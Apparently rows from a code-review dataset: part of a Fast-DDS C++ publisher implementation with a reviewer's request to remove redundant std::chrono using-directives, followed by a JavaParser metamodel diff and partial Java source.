const PublisherAttributes& att,
PublisherListener* listen )
: mp_participant(p)
, mp_writer(nullptr)
, mp_type(pdatatype)
, m_att(att)
#pragma warning (disable : 4355 )
, m_history(att.topic,
pdatatype->m_typeSize
#if HAVE_SECURITY
// In future v2 the change pool is in the writer, and the writer sets this value on the cache change pool.
+ 20 /*SecureDataHeader*/ + 4 + ((2 * 16) /*EVP_MAX_IV_LENGTH max block size*/ - 1 ) /* SecureDataBody*/
+ 16 + 4 /*SecureDataTag*/
#endif
, att.historyMemoryPolicy)
, mp_listener(listen)
#pragma warning (disable : 4355 )
, m_writerListener(this)
, mp_userPublisher(nullptr)
, mp_rtpsParticipant(nullptr)
, high_mark_for_frag_(0)
, deadline_duration_us_(m_att.qos.m_deadline.period.to_ns() * 1e-3)
, timer_owner_()
, deadline_missed_status_()
, lifespan_duration_us_(m_att.qos.m_lifespan.duration.to_ns() * 1e-3)
{
deadline_timer_ = new TimedEvent(mp_participant->get_resource_event(),
[&]() -> bool
{
return deadline_missed();
},
att.qos.m_deadline.period.to_ns() * 1e-6);
lifespan_timer_ = new TimedEvent(mp_participant->get_resource_event(),
[&]() -> bool
{
return lifespan_expired();
},
m_att.qos.m_lifespan.duration.to_ns() * 1e-6);
}
PublisherImpl::~PublisherImpl()
{
delete(lifespan_timer_);
delete(deadline_timer_);
if (mp_writer != nullptr)
{
logInfo(PUBLISHER, this->getGuid().entityId << " in topic: " << this->m_att.topic.topicName);
}
RTPSDomain::removeRTPSWriter(mp_writer);
delete(this->mp_userPublisher);
}
bool PublisherImpl::create_new_change(
ChangeKind_t changeKind,
void* data)
{
WriteParams wparams;
return create_new_change_with_params(changeKind, data, wparams);
}
bool PublisherImpl::create_new_change_with_params(
ChangeKind_t changeKind,
void* data,
WriteParams& wparams)
{
/// Preconditions
if (data == nullptr)
{
logError(PUBLISHER, "Data pointer not valid");
return false;
}
if (changeKind == NOT_ALIVE_UNREGISTERED || changeKind == NOT_ALIVE_DISPOSED ||
changeKind == NOT_ALIVE_DISPOSED_UNREGISTERED)
{
if (m_att.topic.topicKind == NO_KEY)
{
logError(PUBLISHER, "Topic is NO_KEY, operation not permitted");
return false;
}
}
InstanceHandle_t handle;
if (m_att.topic.topicKind == WITH_KEY)
{
bool is_key_protected = false;
#if HAVE_SECURITY
is_key_protected = mp_writer->getAttributes().security_attributes().is_key_protected;
#endif
mp_type->getKey(data, &handle, is_key_protected);
}
// Block lowlevel writer
auto max_blocking_time = steady_clock::now() +
microseconds(::TimeConv::Time_t2MicroSecondsInt64(m_att.qos.m_reliability.max_blocking_time));
#if HAVE_STRICT_REALTIME
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex(), std::defer_lock);
if (lock.try_lock_until(max_blocking_time))
#else
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
#endif
{
CacheChange_t* ch = mp_writer->new_change(mp_type->getSerializedSizeProvider(data), changeKind, handle);
if (ch != nullptr)
{
if (changeKind == ALIVE)
{
// If these two checks are correct, we assume the cache change is valid and then we can write to it.
if (!mp_type->serialize(data, &ch->serializedPayload))
{
logWarning(RTPS_WRITER, "RTPSWriter:Serialization returns false"; );
m_history.release_Cache(ch);
return false;
}
}
//TODO(Ricardo) This logic in a class. Then a user of rtps layer can use it.
if (high_mark_for_frag_ == 0)
{
uint32_t max_data_size = mp_writer->getMaxDataSize();
uint32_t writer_throughput_controller_bytes =
mp_writer->calculateMaxDataSize(m_att.throughputController.bytesPerPeriod);
uint32_t participant_throughput_controller_bytes =
mp_writer->calculateMaxDataSize(
mp_rtpsParticipant->getRTPSParticipantAttributes().throughputController.bytesPerPeriod);
high_mark_for_frag_ =
max_data_size > writer_throughput_controller_bytes ?
writer_throughput_controller_bytes :
(max_data_size > participant_throughput_controller_bytes ?
participant_throughput_controller_bytes :
max_data_size);
high_mark_for_frag_ &= ~3;
}
uint32_t final_high_mark_for_frag = high_mark_for_frag_;
// If inline QoS is needed for related_sample_identity, then remove the inline QoS size from the final fragment size.
if (wparams.related_sample_identity() != SampleIdentity::unknown())
{
final_high_mark_for_frag -= 32;
}
// If it is big data, fragment it.
if (ch->serializedPayload.length > final_high_mark_for_frag)
{
/// Fragment the data.
// Set the fragment size to the cachechange.
// Note: high_mark will always be a value that can be cast to uint16_t.
ch->setFragmentSize((uint16_t)final_high_mark_for_frag);
}
InstanceHandle_t change_handle = ch->instanceHandle;
if (!this->m_history.add_pub_change(ch, wparams, lock, max_blocking_time))
{
m_history.release_Cache(ch);
return false;
}
if (m_att.qos.m_deadline.period != c_TimeInfinite)
{
if (!m_history.set_next_deadline(
change_handle,
steady_clock::now() + duration_cast<system_clock::duration>(deadline_duration_us_)))
{
logError(PUBLISHER, "Could not set the next deadline in the history");
}
else
{
if (timer_owner_ == handle || timer_owner_ == InstanceHandle_t())
{
if (deadline_timer_reschedule())
{
deadline_timer_->cancel_timer();
deadline_timer_->restart_timer();
}
}
}
}
if (m_att.qos.m_lifespan.duration != c_TimeInfinite)
{
lifespan_duration_us_ = duration<double, std::ratio<1, 1000000> >(
m_att.qos.m_lifespan.duration.to_ns() * 1e-3);
lifespan_timer_->update_interval_millisec(m_att.qos.m_lifespan.duration.to_ns() * 1e-6);
lifespan_timer_->restart_timer();
}
return true;
}
}
return false;
}
bool PublisherImpl::removeMinSeqChange()
{
return m_history.removeMinChange();
}
bool PublisherImpl::removeAllChange(
size_t* removed)
{
return m_history.removeAllChange(removed);
}
const GUID_t& PublisherImpl::getGuid()
{
return mp_writer->getGuid();
}
//
bool PublisherImpl::updateAttributes(
const PublisherAttributes& att)
{
bool updated = true;
bool missing = false;
if (this->m_att.qos.m_reliability.kind == RELIABLE_RELIABILITY_QOS)
{
if (att.unicastLocatorList.size() != this->m_att.unicastLocatorList.size() ||
att.multicastLocatorList.size() != this->m_att.multicastLocatorList.size())
{
logWarning(PUBLISHER, "Locator Lists cannot be changed or updated in this version");
updated &= false;
}
else
{
for (LocatorListConstIterator lit1 = this->m_att.unicastLocatorList.begin();
lit1 != this->m_att.unicastLocatorList.end(); ++lit1)
{
missing = true;
for (LocatorListConstIterator lit2 = att.unicastLocatorList.begin();
lit2 != att.unicastLocatorList.end(); ++lit2)
{
if (*lit1 == *lit2)
{
missing = false;
break;
}
}
if (missing)
{
logWarning(PUBLISHER, "Locator: " << *lit1 << " not present in new list");
logWarning(PUBLISHER, "Locator Lists cannot be changed or updated in this version");
}
}
for (LocatorListConstIterator lit1 = this->m_att.multicastLocatorList.begin();
lit1 != this->m_att.multicastLocatorList.end(); ++lit1)
{
missing = true;
for (LocatorListConstIterator lit2 = att.multicastLocatorList.begin();
lit2 != att.multicastLocatorList.end(); ++lit2)
{
if (*lit1 == *lit2)
{
missing = false;
break;
}
}
if (missing)
{
logWarning(PUBLISHER, "Locator: " << *lit1 << " not present in new list");
logWarning(PUBLISHER, "Locator Lists cannot be changed or updated in this version");
}
}
}
}
//TOPIC ATTRIBUTES
if (this->m_att.topic != att.topic)
{
logWarning(PUBLISHER, "Topic Attributes cannot be updated");
updated &= false;
}
//QOS:
//CHECK IF THE QOS CAN BE SET
if (!this->m_att.qos.canQosBeUpdated(att.qos))
{
updated &= false;
}
if (updated)
{
if (this->m_att.qos.m_reliability.kind == RELIABLE_RELIABILITY_QOS)
{
//UPDATE TIMES:
StatefulWriter* sfw = (StatefulWriter*)mp_writer;
sfw->updateTimes(att.times);
}
this->m_att.qos.setQos(att.qos, false);
this->m_att = att;
//Notify the participant that a Writer has changed its QOS
mp_rtpsParticipant->updateWriter(this->mp_writer, m_att.topic, m_att.qos);
// Deadline
if (m_att.qos.m_deadline.period != c_TimeInfinite)
{
deadline_duration_us_ =
duration<double, std::ratio<1, 1000000> >(m_att.qos.m_deadline.period.to_ns() * 1e-3);
deadline_timer_->update_interval_millisec(m_att.qos.m_deadline.period.to_ns() * 1e-6);
}
else
{
deadline_timer_->cancel_timer();
}
// Lifespan
if (m_att.qos.m_lifespan.duration != c_TimeInfinite)
{
lifespan_duration_us_ =
duration<double, std::ratio<1, 1000000> >(m_att.qos.m_lifespan.duration.to_ns() * 1e-3);
lifespan_timer_->update_interval_millisec(m_att.qos.m_lifespan.duration.to_ns() * 1e-6);
}
else
{
lifespan_timer_->cancel_timer();
}
}
return updated;
}
void PublisherImpl::PublisherWriterListener::onWriterMatched(
RTPSWriter* /*writer*/,
MatchingInfo& info)
{
if ( mp_publisherImpl->mp_listener != nullptr )
{
mp_publisherImpl->mp_listener->onPublicationMatched(mp_publisherImpl->mp_userPublisher, info);
}
}
void PublisherImpl::PublisherWriterListener::onWriterChangeReceivedByAll(
RTPSWriter* /*writer*/,
CacheChange_t* ch)
{
if (mp_publisherImpl->m_att.qos.m_durability.kind == VOLATILE_DURABILITY_QOS)
{
mp_publisherImpl->m_history.remove_change_g(ch);
}
}
void PublisherImpl::PublisherWriterListener::on_liveliness_lost(
RTPSWriter* writer,
const LivelinessLostStatus& status)
{
(void)writer;
if (mp_publisherImpl->mp_listener != nullptr)
{
mp_publisherImpl->mp_listener->on_liveliness_lost(
mp_publisherImpl->mp_userPublisher,
status);
}
}
bool PublisherImpl::wait_for_all_acked(
const eprosima::fastrtps::Duration_t& max_wait)
{
return mp_writer->wait_for_all_acked(max_wait);
}
bool PublisherImpl::deadline_timer_reschedule()
{
assert(m_att.qos.m_deadline.period != c_TimeInfinite);
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
steady_clock::time_point next_deadline_us;
if (!m_history.get_next_deadline(timer_owner_, next_deadline_us))
{
logError(PUBLISHER, "Could not get the next deadline from the history");
return false;
}
auto interval_ms = duration_cast<milliseconds>(next_deadline_us - steady_clock::now());
deadline_timer_->update_interval_millisec((double)interval_ms.count());
return true;
}
bool PublisherImpl::deadline_missed()
{
assert(m_att.qos.m_deadline.period != c_TimeInfinite);
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
deadline_missed_status_.total_count++;
deadline_missed_status_.total_count_change++;
deadline_missed_status_.last_instance_handle = timer_owner_;
mp_listener->on_offered_deadline_missed(mp_userPublisher, deadline_missed_status_);
deadline_missed_status_.total_count_change = 0;
if (!m_history.set_next_deadline(
timer_owner_,
steady_clock::now() + duration_cast<system_clock::duration>(deadline_duration_us_)))
{
logError(PUBLISHER, "Could not set the next deadline in the history");
return false;
}
return deadline_timer_reschedule();
}
void PublisherImpl::get_offered_deadline_missed_status(
OfferedDeadlineMissedStatus& status)
{
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
status = deadline_missed_status_;
deadline_missed_status_.total_count_change = 0;
}
bool PublisherImpl::lifespan_expired()
{
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
CacheChange_t* earliest_change;
if (!m_history.get_earliest_change(&earliest_change))
{
return false;
}
auto source_timestamp = system_clock::time_point() + nanoseconds(earliest_change->sourceTimestamp.to_ns());
auto now = system_clock::now();
// Check that the earliest change has expired (the change which started the timer could have been removed from the history)
if (now - source_timestamp < lifespan_duration_us_)
{
auto interval = source_timestamp - now + lifespan_duration_us_;
lifespan_timer_->update_interval_millisec((double)duration_cast<milliseconds>(interval).count());
return true;
}
// The earliest change has expired
m_history.remove_change_pub(earliest_change);
// Set the timer for the next change if there is one
if (!m_history.get_earliest_change(&earliest_change))
{
return false;
}
// Calculate when the next change is due to expire and restart
source_timestamp = system_clock::time_point() + nanoseconds(earliest_change->sourceTimestamp.to_ns());
now = system_clock::now();
auto interval = source_timestamp - now + lifespan_duration_us_;
assert(interval.count() > 0);
lifespan_timer_->update_interval_millisec((double)duration_cast<milliseconds>(interval).count());
return true;
}
void PublisherImpl::get_liveliness_lost_status(
LivelinessLostStatus& status)
{
std::unique_lock<RecursiveTimedMutex> lock(mp_writer->getMutex());
status = mp_writer->liveliness_lost_status_;
mp_writer->liveliness_lost_status_.total_count_change = 0u;
}
void PublisherImpl::assert_liveliness()
{
if (!mp_rtpsParticipant->wlp()->assert_liveliness(
mp_writer->getGuid(),
mp_writer->get_liveliness_kind(),
mp_writer->get_liveliness_lease_duration()))
{
logError(PUBLISHER, "Could not assert liveliness of writer " << mp_writer->getGuid());
}
if (m_att.qos.m_liveliness.kind == MANUAL_BY_TOPIC_LIVELINESS_QOS)
{
// As described in the RTPS specification, if liveliness kind is manual a heartbeat must be sent
// This only applies to stateful writers, as stateless writers do not send heartbeats
StatefulWriter* stateful_writer = dynamic_cast<StatefulWriter*>(mp_writer);
if (stateful_writer != nullptr)
{
stateful_writer->send_periodic_heartbeat(true, true);
}
}
}
| 1 | 17,319 | Another cleanup. There are two additional `using namespace std::chrono;` under this one. Should also remove std::chrono:: from the full file. Please do this on a single commit. | eProsima-Fast-DDS | cpp |
@@ -501,7 +501,7 @@ public final class JavaParserMetaModel {
enclosedExprMetaModel.getDeclaredPropertyMetaModels().add(enclosedExprMetaModel.innerPropertyMetaModel);
fieldAccessExprMetaModel.namePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "name", com.github.javaparser.ast.expr.SimpleName.class, Optional.of(simpleNameMetaModel), false, false, false, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.namePropertyMetaModel);
- fieldAccessExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), true, false, false, false, false);
+ fieldAccessExprMetaModel.scopePropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "scope", com.github.javaparser.ast.expr.Expression.class, Optional.of(expressionMetaModel), false, false, false, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.scopePropertyMetaModel);
fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel = new PropertyMetaModel(fieldAccessExprMetaModel, "typeArguments", com.github.javaparser.ast.type.Type.class, Optional.of(typeMetaModel), true, false, true, false, false);
fieldAccessExprMetaModel.getDeclaredPropertyMetaModels().add(fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel); | 1 | package com.github.javaparser.metamodel;
import com.github.javaparser.ast.*;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
/**
* The model contains meta-data about all nodes in the AST.
*/
public final class JavaParserMetaModel {
private JavaParserMetaModel() {
}
private static final List<BaseNodeMetaModel> nodeMetaModels = new ArrayList<>();
private static void initializeConstructorParameters() {
bodyDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.modifiersPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.typeParametersPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.namePropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.parametersPropertyMetaModel);
callableDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel);
typeMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
annotationExprMetaModel.getConstructorParameters().add(annotationExprMetaModel.namePropertyMetaModel);
typeDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
typeDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
typeDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.namePropertyMetaModel);
typeDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.membersPropertyMetaModel);
referenceTypeMetaModel.getConstructorParameters().add(typeMetaModel.annotationsPropertyMetaModel);
literalStringValueExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
stringLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
moduleDeclarationMetaModel.getConstructorParameters().add(moduleDeclarationMetaModel.annotationsPropertyMetaModel);
moduleDeclarationMetaModel.getConstructorParameters().add(moduleDeclarationMetaModel.namePropertyMetaModel);
moduleDeclarationMetaModel.getConstructorParameters().add(moduleDeclarationMetaModel.isOpenPropertyMetaModel);
moduleDeclarationMetaModel.getConstructorParameters().add(moduleDeclarationMetaModel.moduleStmtsPropertyMetaModel);
arrayCreationLevelMetaModel.getConstructorParameters().add(arrayCreationLevelMetaModel.dimensionPropertyMetaModel);
arrayCreationLevelMetaModel.getConstructorParameters().add(arrayCreationLevelMetaModel.annotationsPropertyMetaModel);
compilationUnitMetaModel.getConstructorParameters().add(compilationUnitMetaModel.packageDeclarationPropertyMetaModel);
compilationUnitMetaModel.getConstructorParameters().add(compilationUnitMetaModel.importsPropertyMetaModel);
compilationUnitMetaModel.getConstructorParameters().add(compilationUnitMetaModel.typesPropertyMetaModel);
compilationUnitMetaModel.getConstructorParameters().add(compilationUnitMetaModel.modulePropertyMetaModel);
packageDeclarationMetaModel.getConstructorParameters().add(packageDeclarationMetaModel.annotationsPropertyMetaModel);
packageDeclarationMetaModel.getConstructorParameters().add(packageDeclarationMetaModel.namePropertyMetaModel);
annotationDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
annotationDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
annotationDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.namePropertyMetaModel);
annotationDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.membersPropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(annotationMemberDeclarationMetaModel.modifiersPropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(annotationMemberDeclarationMetaModel.typePropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(annotationMemberDeclarationMetaModel.namePropertyMetaModel);
annotationMemberDeclarationMetaModel.getConstructorParameters().add(annotationMemberDeclarationMetaModel.defaultValuePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(classOrInterfaceDeclarationMetaModel.isInterfacePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.namePropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(classOrInterfaceDeclarationMetaModel.typeParametersPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(classOrInterfaceDeclarationMetaModel.extendedTypesPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(classOrInterfaceDeclarationMetaModel.implementedTypesPropertyMetaModel);
classOrInterfaceDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.membersPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.modifiersPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.typeParametersPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.namePropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.parametersPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel);
constructorDeclarationMetaModel.getConstructorParameters().add(constructorDeclarationMetaModel.bodyPropertyMetaModel);
enumConstantDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
enumConstantDeclarationMetaModel.getConstructorParameters().add(enumConstantDeclarationMetaModel.namePropertyMetaModel);
enumConstantDeclarationMetaModel.getConstructorParameters().add(enumConstantDeclarationMetaModel.argumentsPropertyMetaModel);
enumConstantDeclarationMetaModel.getConstructorParameters().add(enumConstantDeclarationMetaModel.classBodyPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.modifiersPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.namePropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(enumDeclarationMetaModel.implementedTypesPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(enumDeclarationMetaModel.entriesPropertyMetaModel);
enumDeclarationMetaModel.getConstructorParameters().add(typeDeclarationMetaModel.membersPropertyMetaModel);
fieldDeclarationMetaModel.getConstructorParameters().add(fieldDeclarationMetaModel.modifiersPropertyMetaModel);
fieldDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
fieldDeclarationMetaModel.getConstructorParameters().add(fieldDeclarationMetaModel.variablesPropertyMetaModel);
initializerDeclarationMetaModel.getConstructorParameters().add(initializerDeclarationMetaModel.isStaticPropertyMetaModel);
initializerDeclarationMetaModel.getConstructorParameters().add(initializerDeclarationMetaModel.bodyPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.modifiersPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(bodyDeclarationMetaModel.annotationsPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.typeParametersPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(methodDeclarationMetaModel.typePropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.namePropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.parametersPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(callableDeclarationMetaModel.thrownExceptionsPropertyMetaModel);
methodDeclarationMetaModel.getConstructorParameters().add(methodDeclarationMetaModel.bodyPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.modifiersPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.annotationsPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.typePropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.isVarArgsPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.varArgsAnnotationsPropertyMetaModel);
parameterMetaModel.getConstructorParameters().add(parameterMetaModel.namePropertyMetaModel);
variableDeclaratorMetaModel.getConstructorParameters().add(variableDeclaratorMetaModel.typePropertyMetaModel);
variableDeclaratorMetaModel.getConstructorParameters().add(variableDeclaratorMetaModel.namePropertyMetaModel);
variableDeclaratorMetaModel.getConstructorParameters().add(variableDeclaratorMetaModel.initializerPropertyMetaModel);
commentMetaModel.getConstructorParameters().add(commentMetaModel.contentPropertyMetaModel);
blockCommentMetaModel.getConstructorParameters().add(commentMetaModel.contentPropertyMetaModel);
javadocCommentMetaModel.getConstructorParameters().add(commentMetaModel.contentPropertyMetaModel);
lineCommentMetaModel.getConstructorParameters().add(commentMetaModel.contentPropertyMetaModel);
arrayAccessExprMetaModel.getConstructorParameters().add(arrayAccessExprMetaModel.namePropertyMetaModel);
arrayAccessExprMetaModel.getConstructorParameters().add(arrayAccessExprMetaModel.indexPropertyMetaModel);
arrayCreationExprMetaModel.getConstructorParameters().add(arrayCreationExprMetaModel.elementTypePropertyMetaModel);
arrayCreationExprMetaModel.getConstructorParameters().add(arrayCreationExprMetaModel.levelsPropertyMetaModel);
arrayCreationExprMetaModel.getConstructorParameters().add(arrayCreationExprMetaModel.initializerPropertyMetaModel);
arrayInitializerExprMetaModel.getConstructorParameters().add(arrayInitializerExprMetaModel.valuesPropertyMetaModel);
assignExprMetaModel.getConstructorParameters().add(assignExprMetaModel.targetPropertyMetaModel);
assignExprMetaModel.getConstructorParameters().add(assignExprMetaModel.valuePropertyMetaModel);
assignExprMetaModel.getConstructorParameters().add(assignExprMetaModel.operatorPropertyMetaModel);
binaryExprMetaModel.getConstructorParameters().add(binaryExprMetaModel.leftPropertyMetaModel);
binaryExprMetaModel.getConstructorParameters().add(binaryExprMetaModel.rightPropertyMetaModel);
binaryExprMetaModel.getConstructorParameters().add(binaryExprMetaModel.operatorPropertyMetaModel);
booleanLiteralExprMetaModel.getConstructorParameters().add(booleanLiteralExprMetaModel.valuePropertyMetaModel);
castExprMetaModel.getConstructorParameters().add(castExprMetaModel.typePropertyMetaModel);
castExprMetaModel.getConstructorParameters().add(castExprMetaModel.expressionPropertyMetaModel);
charLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
classExprMetaModel.getConstructorParameters().add(classExprMetaModel.typePropertyMetaModel);
conditionalExprMetaModel.getConstructorParameters().add(conditionalExprMetaModel.conditionPropertyMetaModel);
conditionalExprMetaModel.getConstructorParameters().add(conditionalExprMetaModel.thenExprPropertyMetaModel);
conditionalExprMetaModel.getConstructorParameters().add(conditionalExprMetaModel.elseExprPropertyMetaModel);
doubleLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
enclosedExprMetaModel.getConstructorParameters().add(enclosedExprMetaModel.innerPropertyMetaModel);
fieldAccessExprMetaModel.getConstructorParameters().add(fieldAccessExprMetaModel.scopePropertyMetaModel);
fieldAccessExprMetaModel.getConstructorParameters().add(fieldAccessExprMetaModel.typeArgumentsPropertyMetaModel);
fieldAccessExprMetaModel.getConstructorParameters().add(fieldAccessExprMetaModel.namePropertyMetaModel);
instanceOfExprMetaModel.getConstructorParameters().add(instanceOfExprMetaModel.expressionPropertyMetaModel);
instanceOfExprMetaModel.getConstructorParameters().add(instanceOfExprMetaModel.typePropertyMetaModel);
integerLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
lambdaExprMetaModel.getConstructorParameters().add(lambdaExprMetaModel.parametersPropertyMetaModel);
lambdaExprMetaModel.getConstructorParameters().add(lambdaExprMetaModel.bodyPropertyMetaModel);
lambdaExprMetaModel.getConstructorParameters().add(lambdaExprMetaModel.isEnclosingParametersPropertyMetaModel);
longLiteralExprMetaModel.getConstructorParameters().add(literalStringValueExprMetaModel.valuePropertyMetaModel);
markerAnnotationExprMetaModel.getConstructorParameters().add(annotationExprMetaModel.namePropertyMetaModel);
memberValuePairMetaModel.getConstructorParameters().add(memberValuePairMetaModel.namePropertyMetaModel);
memberValuePairMetaModel.getConstructorParameters().add(memberValuePairMetaModel.valuePropertyMetaModel);
methodCallExprMetaModel.getConstructorParameters().add(methodCallExprMetaModel.scopePropertyMetaModel);
methodCallExprMetaModel.getConstructorParameters().add(methodCallExprMetaModel.typeArgumentsPropertyMetaModel);
methodCallExprMetaModel.getConstructorParameters().add(methodCallExprMetaModel.namePropertyMetaModel);
methodCallExprMetaModel.getConstructorParameters().add(methodCallExprMetaModel.argumentsPropertyMetaModel);
methodReferenceExprMetaModel.getConstructorParameters().add(methodReferenceExprMetaModel.scopePropertyMetaModel);
methodReferenceExprMetaModel.getConstructorParameters().add(methodReferenceExprMetaModel.typeArgumentsPropertyMetaModel);
methodReferenceExprMetaModel.getConstructorParameters().add(methodReferenceExprMetaModel.identifierPropertyMetaModel);
nameExprMetaModel.getConstructorParameters().add(nameExprMetaModel.namePropertyMetaModel);
nameMetaModel.getConstructorParameters().add(nameMetaModel.qualifierPropertyMetaModel);
nameMetaModel.getConstructorParameters().add(nameMetaModel.identifierPropertyMetaModel);
nameMetaModel.getConstructorParameters().add(nameMetaModel.annotationsPropertyMetaModel);
normalAnnotationExprMetaModel.getConstructorParameters().add(annotationExprMetaModel.namePropertyMetaModel);
normalAnnotationExprMetaModel.getConstructorParameters().add(normalAnnotationExprMetaModel.pairsPropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.scopePropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.typePropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.typeArgumentsPropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.argumentsPropertyMetaModel);
objectCreationExprMetaModel.getConstructorParameters().add(objectCreationExprMetaModel.anonymousClassBodyPropertyMetaModel);
simpleNameMetaModel.getConstructorParameters().add(simpleNameMetaModel.identifierPropertyMetaModel);
singleMemberAnnotationExprMetaModel.getConstructorParameters().add(annotationExprMetaModel.namePropertyMetaModel);
singleMemberAnnotationExprMetaModel.getConstructorParameters().add(singleMemberAnnotationExprMetaModel.memberValuePropertyMetaModel);
superExprMetaModel.getConstructorParameters().add(superExprMetaModel.classExprPropertyMetaModel);
thisExprMetaModel.getConstructorParameters().add(thisExprMetaModel.classExprPropertyMetaModel);
typeExprMetaModel.getConstructorParameters().add(typeExprMetaModel.typePropertyMetaModel);
unaryExprMetaModel.getConstructorParameters().add(unaryExprMetaModel.expressionPropertyMetaModel);
unaryExprMetaModel.getConstructorParameters().add(unaryExprMetaModel.operatorPropertyMetaModel);
variableDeclarationExprMetaModel.getConstructorParameters().add(variableDeclarationExprMetaModel.modifiersPropertyMetaModel);
variableDeclarationExprMetaModel.getConstructorParameters().add(variableDeclarationExprMetaModel.annotationsPropertyMetaModel);
